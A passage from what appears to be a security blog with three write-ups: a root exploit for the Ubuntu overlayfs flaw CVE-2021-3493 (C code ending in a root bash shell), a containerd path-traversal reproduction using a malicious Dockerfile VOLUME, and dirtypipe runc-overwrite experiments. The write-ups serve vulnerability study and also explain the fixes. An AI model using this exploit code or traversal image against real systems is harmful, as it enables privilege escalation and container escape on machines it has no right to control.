} else if (rd == -1) {
if (errno == EINTR)
continue;
err(1, "read %s", src);
}
char *p = buf;
while (rd > 0) {
wr = write(fo, p, rd);
if (wr == -1) {
if (errno == EINTR)
continue;
err(1, "write %s", dst);
}
p += wr;
rd -= wr;
}
}
close(fi);
close(fo);
}
static int exploit()
{
char buf[4096];
sprintf(buf, "rm -rf '%s/'", DIR_BASE);
system(buf);
xmkdir(DIR_BASE, 0777);
xmkdir(DIR_WORK, 0777);
xmkdir(DIR_LOWER, 0777);
xmkdir(DIR_UPPER, 0777);
xmkdir(DIR_MERGE, 0777);
uid_t uid = getuid();
gid_t gid = getgid();
if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
err(1, "unshare");
xwritefile("/proc/self/setgroups", "deny");
sprintf(buf, "0 %d 1", uid);
xwritefile("/proc/self/uid_map", buf);
sprintf(buf, "0 %d 1", gid);
xwritefile("/proc/self/gid_map", buf);
sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
err(1, "mount %s", DIR_MERGE);
// all+ep
char cap[] = "\x01\x00\x00\x02\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";
xcopyfile("/proc/self/exe", BIN_MERGE, 0777);
if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)
err(1, "setxattr %s", BIN_MERGE);
return 0;
}
int main(int argc, char *argv[])
{
if (strstr(argv[0], "magic") || (argc > 1 && !strcmp(argv[1], "shell"))) {
setuid(0);
setgid(0);
execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);
err(1, "execl /bin/bash");
}
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
_exit(exploit());
} else {
waitpid(child, NULL, 0);
}
execl(BIN_UPPER, BIN_UPPER, "shell", NULL);
err(1, "execl %s", BIN_UPPER);
}
</code></pre></div></div>
<p>The exploit works as follows:</p>
<ol>
<li>create a child process</li>
<li>child: create the lowerdir, upperdir, workdir, mergedir</li>
<li>child: unshare to create a new mount ns and user ns, and write the uid_map and gid_map file for new user ns</li>
<li>child: mount overlayfs in new user ns this only works in Ubuntu as the Ubunu has a change for overlayfs</li>
<li>child: copy the exploit binary to merge directory, this will actually create a new file in upperdir</li>
<li>child: setxattr to set the exploit binary in merge dir, this will finally set the file’s xattr in upperdir as the second of ‘vfs_setxattr’ will set the file’s capabilities directly</li>
<li>parent: execute the exploit binary in upperdir with ‘shell’ argument</li>
<li>parent: setuid(0), setgid(0) and then execute a bash. As the exploit in upperdir binary has all capabilities, the setuid(0) will success</li>
</ol>
<h3> The fix </h3>
<p>The fix is in <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7c03e2cda4a584cadc398e8f6641ca9988a39d52">this commit</a>.
The change is to move the ‘cap_convert_nscap’ permission check to ‘vfs_setxattr’ from ‘setxattr’. Thus the second call of ‘vfs_setxattr’ with the ext4’s filesystem dentry will also be checked by ‘cap_convert_nscap’. Because the ext4’s super inode’s user ns is the init user ns and the process has no ‘CAP_SETFCAP’ in this user ns so the check will not be passed. Thus the exploit can’t work any more.</p>
<p><img src="/assets/img/cve_2021_3493/14.png" alt="" /></p>
containerd CVE-2022-23648: path traversal never die2022-03-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/26/containerd-CVE-2022-23648
<h3> The spec </h3>
<p>Path traversal is a classical kind of security issue in computer world. This is logical issue so even with the rapid development of technology, this kind of issue still
appear in software. This post try to analysis a <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2244">path traversal issue</a> in containerd which is discovered by <a href="https://twitter.com/_fel1x">Felix Wilhelm</a>. The first part let’s try to explain the related spec so that we can know what the function is and what the violation the implementation has.</p>
<p>Container has a concept of volume. If a container has no volume, the data we changed in container will disappear after the container is destroyed. In order to save data persistently or share data between containers, container came up with the concept of volume. A volume is often(if not all) implemented using bind mount. We can use -v in docker to add a volume.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# mkdir test
root@ubuntu:/home/test/CVE-2022-23648# echo "data in host" > test/aaa
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm -v /home/test/CVE-2022-23648/test:/test ubuntu bash
root@c201b6a39be2:/# mount | grep test
/dev/sda5 on /test type ext4 (rw,relatime,errors=remount-ro)
root@ecc59c1f5bc4:/# ls /test/
aaa
root@ecc59c1f5bc4:/# cat /test/aaa
data in host
root@ecc59c1f5bc4:/# echo "data in guest" >> /test/aaa
root@ecc59c1f5bc4:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# cat test/aaa
data in host
data in guest
</code></pre></div></div>
<p>‘docker inspect containerid’ in the host will show the data in “Mounts”.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "Mounts": [
{
"Type": "bind",
"Source": "/home/test/CVE-2022-23648/test",
"Destination": "/test",
"Mode": "",
"RW": true,
"Propagation": "rprivate"
}
],
</code></pre></div></div>
<p>The OCI image spec also has a field named ‘Volumes’. The <a href="https://github.com/opencontainers/image-spec/blob/main/config.md">definition</a> says it is ‘A set of directories describing where the process is likely to write data specific to a container instance’.</p>
<p>Let’s try to test this feature. First create a Dockerfile.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> from ubuntu:20.04
VOLUME /volume-test/
</code></pre></div></div>
<p>Build it and start a container. We can see there is a mount in the container.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /volume-test/
---> Running in 2b744c0f90ff
Removing intermediate container 2b744c0f90ff
---> 1cf01e39ec82
Successfully built 1cf01e39ec82
Successfully tagged volume-test:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test bash
root@a301238d982c:/# ls -lh /volume-test/
total 0
root@a301238d982c:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
</code></pre></div></div>
<p>The ‘docker inspect’ shows the mount inforamtion as following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "Mounts": [
{
"Type": "volume",
"Name": "e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98",
"Source": "/var/lib/docker/volumes/e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98/_data",
"Destination": "/volume-test",
"Driver": "local",
"Mode": "",
"RW": true,
"Propagation": ""
}
],
</code></pre></div></div>
<p>The ‘docker image inspect’ show the following info:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "Volumes": {
"/volume-test/": {}
},
</code></pre></div></div>
<p>As we can see the ‘Source’ is generated by the runtime ifself and the ‘Destination’ is the name of VOLUME.</p>
<p>As Felix points out When this configuration is converted into an OCI runtime configuration, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md.</p>
<p>“Implementations SHOULD provide mounts for these locations such that application data is not written to the container’s root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location”</p>
<p>The point here is ‘seed the contents of the mount with data in the image at the same location’. It means if the image has data in the mount directory the implementation should also contains the origin data.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
RUN mkdir /volume-test
RUN echo "volume data" > /volume-test/aaa
VOLUME /volume-test/
root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test1 .
Sending build context to Docker daemon 3.584kB
Step 1/4 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/4 : RUN mkdir /volume-test
---> Using cache
---> a05c3161c55d
Step 3/4 : RUN echo "volume data" > /volume-test/aaa
---> Running in 60702a1547f5
Removing intermediate container 60702a1547f5
---> 4702775454c2
Step 4/4 : VOLUME /volume-test/
---> Running in 14963733faf9
Removing intermediate container 14963733faf9
---> cc3e2700af76
Successfully built cc3e2700af76
Successfully tagged volume-test1:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test1 bash
root@20939034b463:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
root@20939034b463:/# ls /volume-test/
aaa
root@20939034b463:/# cat /volume-test/aaa
volume data
</code></pre></div></div>
<p>As we can see, the origin data is in the volue. This is mean ‘seed’ the data. If we do more investigation we can see there are two file named ‘aaa’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# find /var/lib/ -name aaa
/var/lib/docker/volumes/ed8dac626f22fe409ff7159aeb1cc59d90f506876ca655fd5896f007bbbfed36/_data/aaa
/var/lib/docker/overlay2/50c147cecab7d2310c82188c95f3e5711c4e8c096488ba275e143f21afe05123/diff/volume-test/aaa
/var/lib/docker/overlay2/45535f60b70e7185f78837ccac706cb03f3efcb7e0b01dd409aa1d314d8f857c/merged/volume-test/aaa
</code></pre></div></div>
<p>The first is the ‘data’ in the volume, the second and third is the same file which in the container image. The first file is copied from the second directory.</p>
<p>Now we know how the ‘VOLUME’ works from OCI image configuration to OCI runtime configuration. In order to seed the data, the converter need to copy the data in the original image to the container’s mount directory.</p>
<h3> The vulnerability </h3>
<p>The vulnerability occurs in the seed process of containerd. Say if we set the VOLUME to “/../../../../../../../../var/lib/kubelet/pki/”, then the copy process will be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> copy /var/lib/docker/overlay2/xxx/merged//../../../../../../../../var/lib/kubelet/pki/ /var/lib/docker/volumes/yyy/_data/
</code></pre></div></div>
<p>The containerd tries to copy the file in image to the volumes. But it doesn’t check the src this src can be controlled in the OCI image configuration.</p>
<p>The ‘volumeMounts’ in ‘cri/server/container_create.go’ create mounts from ‘Volumes’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *criService) volumeMounts(containerRootDir string, criMounts []*runtime.Mount, config *imagespec.ImageConfig) []*runtime.Mount {
...
var mounts []*runtime.Mount
for dst := range config.Volumes {
...
volumeID := util.GenerateID()
src := filepath.Join(containerRootDir, "volumes", volumeID)
// addOCIBindMounts will create these volumes.
mounts = append(mounts, &runtime.Mount{
ContainerPath: dst,
HostPath: src,
SelinuxRelabel: true,
})
}
return mounts
}
</code></pre></div></div>
<p>The ‘ContainerPath’ can be the malicious path.</p>
<p>Later in the same function the ‘HostPath’ is cleaned, but the ‘ContainerPath’ is not.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if len(volumeMounts) > 0 {
mountMap := make(map[string]string)
for _, v := range volumeMounts {
mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
}
opts = append(opts, customopts.WithVolumes(mountMap))
}
</code></pre></div></div>
<p>Finally in ‘WithVolumes’ in ‘pkg/cri/opts/container.go’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for host, volume := range volumeMounts {
// The volume may have been defined with a C: prefix, which we can't use here.
volume = strings.TrimPrefix(volume, "C:")
for _, mountPath := range mountPaths {
src := filepath.Join(mountPath, volume)
if _, err := os.Stat(src); err != nil {
if os.IsNotExist(err) {
// Skip copying directory if it does not exist.
continue
}
return fmt.Errorf("stat volume in rootfs: %w", err)
}
if err := copyExistingContents(src, host); err != nil {
return fmt.Errorf("taking runtime copy of volume: %w", err)
}
}
}
</code></pre></div></div>
<p>Here the ‘mountPath’ is the host directory pointing to a part of the container rootfs, ‘volume’ is the malicious path, ‘host’ is the host directory that will be mount in the container. The ‘src’ of ‘copyExistingContents’ parameter will like ‘/xxx/xx/../../../../../../../../../etc’, and becomes ‘/etc/’ and this in the host filesystem. So ‘copyExistingContents’ will copy the host filesystem data to the container.</p>
<p>The fix is in this <a href="https://github.com/containerd/containerd/commit/fb0b8d6177538c0da2ddd81b90b8c5e6d96f8b0f">commit</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @@ -112,7 +112,10 @@ func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
// The volume may have been defined with a C: prefix, which we can't use here.
volume = strings.TrimPrefix(volume, "C:")
for _, mountPath := range mountPaths {
- src := filepath.Join(mountPath, volume)
+ src, err := fs.RootPath(mountPath, volume)
+ if err != nil {
+ return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
+ }
if _, err := os.Stat(src); err != nil {
if os.IsNotExist(err) {
// Skip copying directory if it does not exist.
</code></pre></div></div>
<p>It just uses the ‘fs.RootPath’ to replace ‘filepath.Join’. The ‘fs.RootPath’ will evaluate and bound any symlink in ‘volume’ to the root directory.</p>
<h3> Reproduce </h3>
<p>The vulnerability itself is easy to understand. I failed when I tried to use the docker or ctr to reproduce this issue. Fu wei, a containerd maintainer, tells me I should use crictl to reproduce this as the vulnerability code is shipped in the CRI plugin of containerd. This part is mostly about how to setup the crictl environment. In the process I asked a lot from Bonan and Fu wei, thanks! The setup process is mostly from <a href="https://www.yinnote.com/containerd/">this post</a></p>
<h4> Download crictl and set the environment </h4>
<p>In the <a href="https://github.com/kubernetes-sigs/cri-tools/releases">cri-tools release page</a> we download a v1.23.0 version.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tar -xzvf crictl-v1.23.0-linux-amd64.tar.gz -C /usr/bin
crictl
root@ubuntu:/home/test# crictl --version
crictl version v1.23.0
</code></pre></div></div>
<p>Create a new file in /etc/crictl.yaml and add the following configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> runtime-endpoint: unix:///var/run/containerd/containerd.sock
image-endpoint: unix:///var/run/containerd/containerd.sock
timeout: 10
debug: false
</code></pre></div></div>
<p>Create the containerd config file /etc/containerd/config.toml</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# mkdir /etc/containerd
root@ubuntu:/home/test# vi /etc/containerd/config.toml
root@ubuntu:/home/test# systemctl restart containerd
root@ubuntu:/home/test# cat /etc/containerd/config.toml
[plugins]
[plugins.cri]
sandbox_image = "rancher/pause:3.1"
[plugins.cri.cni]
bin_dir = "/opt/cni/bin"
conf_dir = "/etc/cni/net.d"
[plugins.cri.registry]
[plugins.cri.registry.mirrors]
[plugins.cri.registry.mirrors."docker.io"]
endpoint = ["https://docker.mirrors.ustc.edu.cn"]
[plugins.linux]
shim = "containerd-shim"
runtime = "runc"
runtime_root = ""
no_shim = false
shim_debug = false
</code></pre></div></div>
<p>Install cni plugin. Download it from <a href="https://github.com/containernetworking/plugins/releases">cni plugin page</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# mkdir -p /opt/cni/bin
root@ubuntu:/home/test# tar -zxvf cni-plugins-linux-amd64-v1.1.1.tgz -C /opt/cni/bin
./
./macvlan
./static
./vlan
./portmap
./host-local
./vrf
./bridge
./tuning
./firewall
./host-device
./sbr
./loopback
./dhcp
./ptp
./ipvlan
./bandwidth
root@ubuntu:/home/test# vi /etc/cni/net.d/10-mynet.conf
root@ubuntu:/home/test# vi /etc/cni/net.d/99-loopback.conf
root@ubuntu:/home/test# cat /etc/cni/net.d/10-mynet.conf
{
"cniVersion": "0.2.0",
"name": "mynet",
"type": "bridge",
"bridge": "cni0",
"isGateway": true,
"ipMasq": true,
"ipam": {
"type": "host-local",
"subnet": "10.22.0.0/16",
"routes": [
{ "dst": "0.0.0.0/0" }
]
}
}
root@ubuntu:/home/test# cat /etc/cni/net.d/99-loopback.conf
{
"cniVersion": "0.2.0",
"name": "lo",
"type": "loopback"
}
</code></pre></div></div>
<h4> Create container and trigger vulnerability </h4>
<ul>
<li>
<p>Pull the pause image</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# crictl pull registry.aliyuncs.com/google_containers/pause:3.6
Image is up to date for sha256:6270bb605e12e581514ada5fd5b3216f727db55dc87d5889c790e4c760683fee
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
root@ubuntu:/home/test# ctr -n k8s.io image tag registry.aliyuncs.com/google_containers/pause:3.6 k8s.gcr.io/pause:3.6
k8s.gcr.io/pause:3.6
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
</code></pre></div> </div>
</li>
<li>
<p>Create the mailicious image</p>
</li>
</ul>
<p>Built it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# echo "host" > /etc/ssh/host_file
root@ubuntu:/home/test/CVE-2022-23648# vi Dockerfile
root@ubuntu:/home/test/CVE-2022-23648# docker build -t cve-2022-23648 .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /../../../../../../../../etc/ssh
---> Running in 06720320c1f6
Removing intermediate container 06720320c1f6
---> b253bcd6793c
Successfully built b253bcd6793c
Successfully tagged cve-2022-23648:latest
root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
VOLUME /../../../../../../../../etc/ssh
root@ubuntu:/home/test/CVE-2022-23648#
</code></pre></div></div>
<ul>
<li>
<p>Import it in containerd</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# docker save cve-2022-23648 > cve-2022-23648.tar
root@ubuntu:/home/test/CVE-2022-23648# ctr -n k8s.io image import cve-2022-23648.tar
unpacking docker.io/library/cve-2022-23648:latest (sha256:6280c4ac2a16fb85d1c15d4c43055a32ce226c04bbdb0358c8f0b39d93aa869a)...done
root@ubuntu:/home/test/CVE-2022-23648# crictl image
IMAGE TAG IMAGE ID SIZE
docker.io/library/cve-2022-23648 latest b253bcd6793c2 75.1MB
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
</code></pre></div> </div>
</li>
<li>
<p>Run the malicious image</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
ba2d0c46c5502c2b9bd7027333c3779095d5e297ef165bfe50b863a0fb82d8c2
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
3bf95742d0fb3 10 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
ba2d0c46c5502 docker.io/library/cve-2022-23648:latest 14 seconds ago Running test 0 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it ba2d0c46c5502 bash
root@ubuntu:/# ls /etc/ssh/
root@ubuntu:/# ls /etc/ssh
</code></pre></div> </div>
</li>
</ul>
<p>Emmm, no host data. Wha’t wrong. From this <a href="https://ubuntu.com/security/CVE-2022-23648">page</a>, we can see my containerd is fixed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# containerd --version
containerd github.com/containerd/containerd 1.5.5-0ubuntu3~20.04.2
root@ubuntu:/home/test# which containerd
/usr/bin/containerd
root@ubuntu:/home/test# stat /usr/bin/containerd
File: /usr/bin/containerd
Size: 60305392 Blocks: 117784 IO Block: 4096 regular file
Device: 805h/2053d Inode: 5769129 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2022-03-25 23:43:13.235999616 -0700
Modify: 2022-02-25 12:15:25.000000000 -0800
Change: 2022-03-14 06:37:43.871583849 -0700
Birth: -
</code></pre></div></div>
<ul>
<li>
<p>Install a lower version.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# crictl stopp 3bf95742d0fb3
Stopped sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl rmp 3bf95742d0fb3
Removed sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
fe4ef77ab8e31434ab73e952c69710634a2cc2ec4a2f072cac45436941e7cc6b
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
1ecc6bee60024 4 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
fe4ef77ab8e31 docker.io/library/cve-2022-23648:latest 7 seconds ago Running test 0 1ecc6bee60024
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it fe4ef77ab8e31 bash
root@ubuntu:/# ls /etc/ssh
host_file ssh_config ssh_config.d
root@ubuntu:/# cat /etc/ssh/host_file
host
root@ubuntu:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# containerd --version
containerd github.com/containerd/containerd 1.3.3-0ubuntu2
</code></pre></div> </div>
</li>
</ul>
<p>Finally we reproduce this vulnerability.</p>
<h3> The end </h3>
<p>After reproducing this vulnerability, I want to know why docker and ctr can’t work and discuss a lot with Fu wei. Some the conclusion I made(not sure whether it is 100% accurate):</p>
<p>CRI is the interface between Kubernetes and container runtime. OCI is the spec of how to run a container. So there need some software between the CRI and OCI. This software need to implemenetation CRI interface to Kuberentes and they also need to convert the CRI request to the low level OCI spec and lanuch container. containerd、cri-o is this kind of software. The Kubernetes can also use the docker to run container, But it needs the docker-shim to interacts using CRI interface.</p>
<ul>
<li>containerd. containerd is a container runtime that can be used to manage the container. The containerd not just contain CRI interface, but also some other container management interface.</li>
<li>ctr. ctr is the client test tool of containerd, it just not releated with CRI.</li>
<li>crictl. crictl is a CLI for CRI-compatible container runtimes. It can interact with CRI runtime to manage container.</li>
<li>docker. docker is not related CRI, just another container management.</li>
</ul>
<p>As the vulnerability is in the CRI plugin of containerd, we can only trigger it in the CRI path. In this post I use the crictl to trigger it. It can be also triggered in the Kubernetes which uses the containerd as the CRI runtime.</p>
<h3> reference </h3>
<p><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2244">containerd: Insecure handling of image volumes</a></p>
<p><a href="https://www.yinnote.com/containerd/">使用containerd单独创建容器</a></p>
Container escape using dirtypipe2022-03-19T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/19/container-escape-through-dirtypipe
<h3> Background </h3>
<p>The story begins with the pictures that Yuval Avrahami shows in <a href="https://twitter.com/yuvalavra/status/1500978532494843912/photo/1">twitter</a>. Here it is:</p>
<p><img src="/assets/img/containerescapedirtypipe/1.jpg" alt="" /></p>
<p>It means we can write the host files in /bin directory by using dirtypipe, though in fact the dirtypipe just modify the file’s pagecache.</p>
<p>Then the moresec security researcher also write a <a href="https://mp.weixin.qq.com/s/VMR_kLz1tAbHrequa2OnUA">post</a> to show the capability of using dirtypipe to do container escape.
Also some other researcher such as <a href="https://twitter.com/drivertomtt/status/1504504067975909376">drivertom</a> successfully do this.</p>
<p>At the busy working day, I just have no time to do more experiment. I just discussed the point with some friends. Anyway at the first glance, it seems dirtypipe can’t be used to
do cantainer escape. It is not difficult to understand that the dirtypipe can change the file in other containers as the container may share some of layer files. But as there
is only a file ‘/proc/self/exe’ as I know that can be interacted with the host filesystem. However after CVE-2019-5736, the runc binary is cloned by memfd_create in memory and
it seems we can just overwrite the cloned binary but not the actually runc binary in host filesystem.</p>
<p>So how these guys achieve the container escape by using dirtypipe? Bonan, another excellent cloud native security researcher, mentions that maybe the memfd_create file is copy-on-write.
Then the cloned and the host runc binary maybe share the same physical page, as the dirtypipe modify the cloned pagecache, it also affects the host runc binary. This is quite explainable.
I’m more sure ‘cloned and host runc binary share the same physical page’ is the reason after I dig into the internals of ‘memfd_create’ and ‘sendfile’ syscall.</p>
<h3> Experiment </h3>
<p>If our guess is right, we can stop the escape by using the ‘read’ runc and ‘write’ to memfd_create file to let the memfd_create file and host runc file don’t share the physical page.
Anyway, this is just a guess, we need to prove it. First let’s try to escape and overrite the runc binary from container.</p>
<p>This is easy to achieve by combining the everywhere CVE-2019-5736 poc and dirtypipe PoC. After get the read only runc binary, we can use the dirtypipe to overwrite it.</p>
<p>Before the escape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# mv runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
70df137b272bd8fb1e3e63e90d77943a /usr/sbin/runc
</code></pre></div></div>
<p>After the escape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
687765833647de6091b82896fe90844a /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# head -c 20 /usr/sbin/runc
ELdirtypipe>root@ubuntu:/home/test/go/src/runc# runc --version
bash: /usr/sbin/runc: cannot execute binary file: Exec format error
</code></pre></div></div>
<p>As we can see the host binary is modified so we can do container escape by using dirtypipe.
So let’t do the second experiment: don’t use the sendfile but just use the read-and-write copy (deep copy). Fortunately the runc code just has the methods,
we can easily test it by comment out the sendfile. The patches is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> --- a/libcontainer/nsenter/cloned_binary.c
+++ b/libcontainer/nsenter/cloned_binary.c
@@ -507,13 +507,14 @@ static int clone_binary(void)
goto error_binfd;
while (sent < statbuf.st_size) {
- int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
- if (n < 0) {
+ //int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
+ int n = 0;
+ //if (n < 0) {
/* sendfile can fail so we fallback to a dumb user-space copy. */
n = fd_to_fd(execfd, binfd);
if (n < 0)
goto error_binfd;
- }
+ //}
sent += n;
</code></pre></div></div>
<p>After compile the new runc, we the output shows as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
8a5acd21ac5099abf40c15c815c97de1 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
ece16f4f8aa1518d95a19e9c5b2cb66b /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
bash: /usr/sbin/runc: cannot execute binary file: Exec format error
</code></pre></div></div>
<p>Emmm, interesting, the runc binary is still be modified. We need to go to the runc code to find the truth. After a moment, a suspices function
appears. In the clone_binary it calls ‘try_bindfd’ to get a execfd, it ‘try_bindfd’ success, the ‘sendfile’ and ‘fd_to_fd’ will never be executed.
The comment is quite clear, the copying will be executed only when ‘try_bindfd’ failed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int clone_binary(void)
{
int binfd, execfd;
struct stat statbuf = { };
size_t sent = 0;
int fdtype = EFD_NONE;
/*
* Before we resort to copying, let's try creating an ro-binfd in one shot
* by getting a handle for a read-only bind-mount of the execfd.
*/
execfd = try_bindfd();
if (execfd >= 0)
return execfd;
...
}
</code></pre></div></div>
<p>Let’s comment out the calling of ‘try_bindfd’. Notice: this time we comment out the ‘try_bindfd’ and ‘sendfile’ and uses ‘fd_to_fd’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/go/src/runc# cp runc /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
49f35f333efdfaf628bcd48aee611340 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# md5sum /usr/sbin/runc
49f35f333efdfaf628bcd48aee611340 /usr/sbin/runc
root@ubuntu:/home/test/go/src/runc# runc --version
runc version 1.1.0+dev
commit: v1.1.0-92-g98b75bef-dirty
spec: 1.0.2-dev
go: go1.18
libseccomp: 2.5.1
</code></pre></div></div>
<p>OK, as we can see we can’t modify the runc binary by the deep copy.</p>
<p>Let’s do the final experiment. This test will comment out ‘try_bindfd’ only and the runc will uses ‘sendfile’. As our guess, the runc will also be modified.</p>
